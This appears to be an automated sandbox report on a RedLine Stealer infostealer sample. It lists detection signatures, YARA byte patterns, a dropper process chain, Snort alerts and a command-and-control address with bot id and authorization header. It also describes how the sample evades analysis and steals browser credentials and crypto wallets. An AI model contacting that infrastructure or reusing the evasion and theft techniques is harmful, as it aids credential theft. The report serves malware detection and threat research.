Windows Analysis Report
iOqzwbUlln.exe

Overview

General Information

Sample Name: iOqzwbUlln.exe
Original Sample Name: fc3e0027ffead1129accedcb4814e96f.exe
Analysis ID: 815872
MD5: fc3e0027ffead1129accedcb4814e96f
SHA1: e4c0e5996cb68ef0a79648a6c01e9f0c906986db
SHA256: fdb606c65f84e10b023a3c77a553791291373175953f5c2e98134ebb623d64d1
Tags: exe, RedLineStealer
Infos:

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • iOqzwbUlln.exe (PID: 1592 cmdline: C:\Users\user\Desktop\iOqzwbUlln.exe MD5: FC3E0027FFEAD1129ACCEDCB4814E96F)
    • szV94FU13.exe (PID: 5508 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe MD5: 43AC4F54070D2E111D56AF37CF9C2765)
      • stL82bL52.exe (PID: 4916 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe MD5: 8906052E48565395A2A7E5B0D6584C7E)
        • sQm37qN82.exe (PID: 5108 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe MD5: 64653075A4A9CF43333AE22B968159AB)
          • iDa05Vg46.exe (PID: 5072 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe MD5: CA6D279F0C8A205BFA0F8878D8F7BA2A)
          • kGO12fD60.exe (PID: 6048 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe MD5: 1DC889EA2A05C7C4D829060CABE98814)
  • rundll32.exe (PID: 6028 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 3588 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5088 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 3912 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "193.233.20.23:4123", "Bot Id": "ramon", "Authorization Header": "3197576965d9513f115338c233015b40"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1a438:$pat14: , CommandLine:
  • 0x134ad:$v2_1: ListOfProcesses
  • 0x1328c:$v4_3: base64str
  • 0x13e05:$v4_4: stringKey
  • 0x11b63:$v4_5: BytesToStringConverted
  • 0x10d76:$v4_6: FromBase64
  • 0x12098:$v4_8: procName
  • 0x1281f:$v5_5: FileScanning
  • 0x11d6c:$v5_7: RecordHeaderField
  • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT

Source | Rule | Description | Author | Strings
00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 A8 88 44 24 2B 88 44 24 2F B0 A9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.

Source | Rule | Description | Author | Strings
5.2.kGO12fD60.exe.5130000.6.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
5.2.kGO12fD60.exe.5130000.6.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x2a9e2:$pat14: , CommandLine:
  • 0x1cac9:$v2_1: ListOfProcesses
  • 0x1b1ef:$v4_3: base64str
  • 0x1b1ae:$v4_4: stringKey
  • 0x1b1f9:$v4_5: BytesToStringConverted
  • 0x1b1e4:$v4_6: FromBase64
  • 0x1c784:$v4_8: procName
  • 0x19ed6:$v5_5: FileScanning
  • 0x1a0f4:$v5_7: RecordHeaderField
  • 0x1a026:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
5.2.kGO12fD60.exe.4bb0000.4.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
5.2.kGO12fD60.exe.4bb0000.4.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x2b8ca:$pat14: , CommandLine:
  • 0x1d9b1:$v2_1: ListOfProcesses
  • 0x1c0d7:$v4_3: base64str
  • 0x1c096:$v4_4: stringKey
  • 0x1c0e1:$v4_5: BytesToStringConverted
  • 0x1c0cc:$v4_6: FromBase64
  • 0x1d66c:$v4_8: procName
  • 0x1adbe:$v5_5: FileScanning
  • 0x1afdc:$v5_7: RecordHeaderField
  • 0x1af0e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
5.2.kGO12fD60.exe.2206cde.3.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

No Sigma rule has matched

Timestamp: 02/27/23-11:39:10.429997
Source IP: 193.233.20.23
Destination IP: 192.168.2.4
SID: 2043234
Source Port: 4123
Destination Port: 49695
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 02/27/23-11:39:21.135506
Source IP: 192.168.2.4
Destination IP: 193.233.20.23
SID: 2043231
Source Port: 49695
Destination Port: 4123
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 02/27/23-11:39:08.913244
Source IP: 192.168.2.4
Destination IP: 193.233.20.23
SID: 2043233
Source Port: 49695
Destination Port: 4123
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: iOqzwbUlln.exe | ReversingLabs: Detection: 66%
Source: iOqzwbUlln.exe | Virustotal: Detection: 57%
Source: iOqzwbUlln.exe | Avira: detected
Source: 193.233.20.23:4123 | Virustotal: Detection: 8%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe | ReversingLabs: Detection: 74%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe | Virustotal: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe | ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe | Virustotal: Detection: 53%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exe | ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exe | Virustotal: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe | ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mlf76Mf25.exe | ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe | ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe | ReversingLabs: Detection: 43%
Source: iOqzwbUlln.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mlf76Mf25.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe | Joe Sandbox ML: detected
Source: 3.3.sQm37qN82.exe.45a7de1.0.unpack | Avira: Label: TR/Patched.Gen
Source: 2.3.stL82bL52.exe.458de20.0.unpack | Avira: Label: TR/Patched.Gen
Source: 1.3.szV94FU13.exe.443b820.0.unpack | Avira: Label: TR/Patched.Gen
Source: 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": "193.233.20.23:4123", "Bot Id": "ramon", "Authorization Header": "3197576965d9513f115338c233015b40"}
Source: C:\Users\user\Desktop\iOqzwbUlln.exe | Code function: 0_2_00E82F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00E82F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe | Code function: 1_2_000C2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_000C2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe | Code function: 2_2_001F2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_001F2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe | Code function: 3_2_00DE2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,3_2_00DE2F1D

Compliance

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe | Unpacked PE file: 5.2.kGO12fD60.exe.400000.0.unpack
Source: iOqzwbUlln.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: iOqzwbUlln.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: 'C:\pacokicewiyo4-jub\cuhepasax\lalakexinej68\viz62 neg.pdb0Xp source: stL82bL52.exe, 00000002.00000003.316888493.000000000452A000.00000004.00000020.00020000.00000000.sdmp, mlf76Mf25.exe.2.dr
Source: Binary string: wextract.pdb source: iOqzwbUlln.exe, stL82bL52.exe.1.dr, sQm37qN82.exe.2.dr, szV94FU13.exe.0.dr
Source: Binary string: wextract.pdbGCTL source: iOqzwbUlln.exe, stL82bL52.exe.1.dr, sQm37qN82.exe.2.dr, szV94FU13.exe.0.dr
Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: sQm37qN82.exe, 00000003.00000003.317740077.00000000045A5000.00000004.00000020.00020000.00000000.sdmp, iDa05Vg46.exe, 00000004.00000000.317923256.0000000000322000.00000002.00000001.01000000.00000007.sdmp, iDa05Vg46.exe.3.dr
Source: Binary string: _.pdb source: kGO12fD60.exe, 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402621555.00000000021C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\pacokicewiyo4-jub\cuhepasax\lalakexinej68\viz62 neg.pdb source: stL82bL52.exe, 00000002.00000003.316888493.000000000452A000.00000004.00000020.00020000.00000000.sdmp, mlf76Mf25.exe.2.dr
Source: Binary string: C:\vicirulupixe-he.pdb source: szV94FU13.exe, 00000001.00000003.315638424.0000000004391000.00000004.00000020.00020000.00000000.sdmp, sQm37qN82.exe, 00000003.00000003.317740077.00000000045A5000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000000.341977935.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, kGO12fD60.exe.3.dr, nAT03lr78.exe.1.dr
Source: Binary string: WC:\vicirulupixe-he.pdb0Xp source: szV94FU13.exe, 00000001.00000003.315638424.0000000004391000.00000004.00000020.00020000.00000000.sdmp, sQm37qN82.exe, 00000003.00000003.317740077.00000000045A5000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000000.341977935.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, kGO12fD60.exe.3.dr, nAT03lr78.exe.1.dr
Source: C:\Users\user\Desktop\iOqzwbUlln.exe | Code function: 0_2_00E82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00E82390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe | Code function: 1_2_000C2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_000C2390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe | Code function: 2_2_001F2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_001F2390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe | Code function: 3_2_00DE2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_00DE2390

Networking

Source: Traffic | Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.4:49695 -> 193.233.20.23:4123
Source: Traffic | Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49695 -> 193.233.20.23:4123
Source: Traffic | Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.23:4123 -> 192.168.2.4:49695
Source: Malware configuration extractor | URLs: 193.233.20.23:4123
Source: Joe Sandbox View | ASN Name: REDCOM-ASRedcomKhabarovskRussiaRU
Source: Joe Sandbox View | IP Address: 193.233.20.23
Source: global traffic | TCP traffic: 192.168.2.4:49695 -> 193.233.20.23:4123
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm8D
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
